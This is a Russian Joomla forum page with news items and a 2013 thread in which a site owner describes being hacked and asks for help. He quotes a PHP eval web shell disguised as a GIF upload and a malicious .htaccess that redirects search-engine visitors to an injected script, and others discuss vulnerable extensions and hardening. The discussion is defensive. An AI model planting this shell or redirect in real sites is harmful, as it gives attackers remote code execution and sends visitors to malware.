Новости Joomla

👩‍💻 События плагинов и порядок их срабатывания при работе с пользовательскими полями Joomla и использовании FieldsHelper.

👩‍💻 События плагинов и порядок их срабатывания при работе с пользовательскими полями Joomla и использовании FieldsHelper.

В процессе работы с Joomla бывает необходимо работать с пользовательским интерфейсом более тонко, чем обычно. Все формы Joomla состоят из стандартных полей, содержанием, стилем отображения, состоянием (включено/выключено, доступно для редактирования или нет и т.д.) можно управлять с помощью плагинов. Да и для нестандартных проектов хорошей практикой является создание одного системного или нескольких плагинов групп "под проект", в которых храниться весь "нестандарт".

В этой статье описаны все триггеры, которые вызываются через Event Dispatcher из administrator/components/com_fields/src/Helper/FieldsHelper.php, с привязкой к жизненному циклу (порядку этапов работы запроса), аргументам, изменяемым данным и дальнейшему распространению по Joomla. Это поможет вам работать с Joomla свободнее и не опасаясь при этом потерять изменения при очередном обновлении движка.

Подходы, описанные в статье, полезны в тех случаях, когда вы работаете с данными в com_fields - механизме создания и редактирования пользовательских полей ядра Joomla и при использовании FieldsHelper. Многие сторонние компоненты не используют эту возможность, поэтому данная статья будет полезна лишь частично.

Читать статью на Хабре.

@joomlafeed

🏆 Открыто голосование за Joomla в премии CMS Critic People’s Choice Awards 2025

🏆 Открыто голосование за Joomla в  премии CMS Critic People’s Choice Awards 2025

🗓 Голосование продлится до 27 февраля 2026 года.

👩‍💻 Проголосовать! 👩‍💻

Номинации, в которых можно проголосовать за Joomla:
⭐️ Best Free CMS
⭐️ Best Open Source CMS
⭐️ Best Enterprise CMS

Также в номинации Best e-Commerce Solution участвуют компоненты интернет-магазинов для Joomla:
⭐️ HikaShop
⭐️ Virtuemart

В номинации Best Website Builder оказались:
⭐️ YooTheme
⭐️ SP Page Builder

Что такое CMS Critic Awards?
С 2012 года премия CMS Critic Awards занимает особое место в сообществе систем управления контентом (CMS). Это единственный в своем роде сайт, который составляет рейтинг системы управления контентом и связанных с ними решений на рынке — от малого до крупного и подчеркивает их инновации и услуги.

Каждый год награда CMS Critic Awards присуждается одному победителю в различных отраслевых категориях, таких как: «Лучшая облачная CMS», «Лучший DXP», «Лучшая Headless CMS и других. Затем результаты оглашаются через СМИ вместе с выбором редакции CMS Critic.
В этом году премия вернулась к своим традициям и только TOP-5 движков по количеству номинаций попали в 2-й этап - голосование.

@joomlafeed

0 Пользователей и 1 Гость просматривают эту тему.
  • 7 Ответов
  • 4525 Просмотров
*

romashkin

  • Осваиваюсь на форуме
  • 34
  • 0 / 0
Всем привет! Сайт на Joomla 1.5, постоянно подвергался следующей атаке.
В папку images заливается gif-файл c кодом
Код
GIF89a1
<?php eval(stripslashes(@$_POST[(chr(112).chr(49))]));?>
Затем в другой произвольной папке создавался php-файл с вирусом и выполнялся. Его я не сохранил..
Полазив по инету нашел подсказку что можно через htaccess сделать так чтобы залитый файл не исполнялся а просто выводился в браузер или давался на скачку при обращении к нему. Проделал данную операцию оданко это не спасло и...

Настал немного черный день, потому что следующая атака оказалась совсем негуманной, в результате которой Google и Яндекс обозвали сайт распространителем вируса и браузеры стали выдавать warning при попытке захода на него.

Атака была похожей только теперь во все каталоги был прописан файл .htaccess следующего содержания
Код
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|yandex|ya|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|linkedin|flickr|filesearch|yell|openstat|metabot|gigablast|entireweb|amfibi|dmoz|yippy|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|infospace|web|websuche|witch|wolong|oekoportal|freenet|arcor|alexana|tiscali|kataweb|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|westaustraliaonline)\.(.*)
RewriteCond %{HTTP_USER_AGENT} ^.*(msie|opera) [NC]
RewriteCond %{REQUEST_FILENAME} !/index_backup.php
RewriteRule (.*) /index_backup.php?query=$1 [QSA,L]
</IfModule>
И соответственно в некоторых директориях появился файл index_backup.php, который я, к сожалению, не сохранил.

В сути проникновения разбираться не стал (скорее всего она была похожей), так как решил поскорее залить чистую версию сайта и убрать ограничения из поисковиков.


Кто что может посоветовать по защите сайта от дальнейших проникновений? И что это было?
И спасет ли переход на свежую версию Joomla! ?

Учитывая, что атаки могли были направлены именно на выбивание сайта из поиска и понижение его позиций в выдаче, возможно ли как-то идентифицировать взломщика? И какие вообще меры можно при успешной идентификации применить?
« Последнее редактирование: 25.05.2013, 21:25:48 от romashkin »
*

AlexSmirnov

  • Завсегдатай
  • 1862
  • 272 / 16
  • Ищите и найдете
Имеются ли/были ли раньше на Вашем веб сайте какие-либо расширения, скачанные с вареза?
# Back the fufalo (особенно ту самую столкершу)! #
# ВАЖНО! Кайфую от удаления присланного в личку спама, почти как от любви (особенно по выходным). #
*

draff

  • Гуру
  • 5801
  • 434 / 7
  • ищу работу
Всем привет! Сайт на Joomla 1.5, постоянно подвергается следующей атаке.
В папку images заливается gif-файл c кодом
С чем связаны все последние заражения сайтов
Цитировать
1. Старые версии движка, ну в прочем для многих не открытие. И уж давно пора все обновить до последних актуальных в своей линейке.
2. Редактор JCE - его последнее время залатывали не раз.
3. NoNumber Framework Joomla - все расширения от NoNumber используют свой Framework, в нем была уязвимость, автор залатывал её, потом переход был на платные версии, может ошибаюсь но, сейчас видимо заплатка прохудилась и скорей всего не будет поддержке старой версии. Получается версии 1.* уязвимы
*

romashkin

  • Осваиваюсь на форуме
  • 34
  • 0 / 0
Имеются ли/были ли раньше на Вашем веб сайте какие-либо расширения, скачанные с вареза?
Скорее всего нет, все расширения качал с офсайта Joomla
*

AlexSmirnov

  • Завсегдатай
  • 1862
  • 272 / 16
  • Ищите и найдете
Тему в ссылке стоит принимать как руководство ТОЛЬКО тем, кто

1 НЕ ИМЕЛ/НЕ ИМЕЕТ на своем веб сайте варезных расширений

2 устанавливал:

-  редактор JCE 2.2.4 и версии, выпущенный перед ней
-  кто устанавливал и продолжает работать на "NoNumber Framework", скачанный до 12 апреля 2012 (http://www.nonumber.nl/news/releases/285-security-fixes--all-nonumber-extensions)
# Back the fufalo (особенно ту самую столкершу)! #
# ВАЖНО! Кайфую от удаления присланного в личку спама, почти как от любви (особенно по выходным). #
*

romashkin

  • Осваиваюсь на форуме
  • 34
  • 0 / 0
*

AlexSmirnov

  • Завсегдатай
  • 1862
  • 272 / 16
  • Ищите и найдете
Ммм...

Судя по этому
Цитировать
все расширения качал с офсайта Joomla
я имею основание не верить.

Тем кто читает эту тему:

не занимайтесь чисткой своего взломанного или зараженного веб сайта до тех пор, пока на нем установлены/были установлены варезные расширения - главный источник распространения вирусов и бэкдоров.
« Последнее редактирование: 25.05.2013, 22:22:38 от AlexSmirnov »
# Back the fufalo (особенно ту самую столкершу)! #
# ВАЖНО! Кайфую от удаления присланного в личку спама, почти как от любви (особенно по выходным). #
*

romashkin

  • Осваиваюсь на форуме
  • 34
  • 0 / 0
Ммм...

Судя по этомуя сомневаюсь в Вашей честности.

Тем кто читает эту тему:

не занимайтесь чисткой своего взломанного или зараженного веб сайта до тех пор, пока на нем установлены варезные расширения - главный источник распространения вирусов и бэкдоров.

По моему нет смысла скачивать бесплатные компоненты (free версии)  с варезных сайтов, а заплатить 15 баксов за полезное расширение на мой взгляд не проблема. Сайт очень простенький. Из расширений только фотогалерея.. Имелось ввиду что скачивал по ссылкам на офсайте Joomla..

Есть веские основания полагать, что атака велась целенаправленно на "этот сайт", а не просто на "случайный сайт на Joomla", с целью дискредитации его в поисковых системах.

Что, в принципе, и удалось.

Из того что сделал - поставил на все папки права 0555, на конфиг-файл 0400, index-ы.php 0600 Добавил .htaccess с запретом доступ к файлам php и pl в папке изображений.
« Последнее редактирование: 25.05.2013, 22:04:12 от romashkin »
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

Файл конфигурации попытка взлома

Автор Evgenii_web

Ответов: 8
Просмотров: 1820
Последний ответ 09.03.2019, 11:06:54
от wishlight
Попытка взлома сайта или что это?

Автор vad78

Ответов: 12
Просмотров: 1955
Последний ответ 11.06.2018, 13:57:10
от vad78
Бесплатная защита сайта от взлома, парсеров, DDoS и других кибератак

Автор Core System

Ответов: 16
Просмотров: 3462
Последний ответ 09.06.2018, 14:58:54
от Core System
БД после взлома

Автор cntrl

Ответов: 11
Просмотров: 1471
Последний ответ 09.01.2018, 17:06:17
от Aleks.Denezh
[скачать] jHackGuard 1.4.0 - плагин защиты от взлома сайта, SQL инъекций, XSS атак

Автор Sulpher

Ответов: 91
Просмотров: 65887
Последний ответ 14.12.2017, 20:22:52
от karam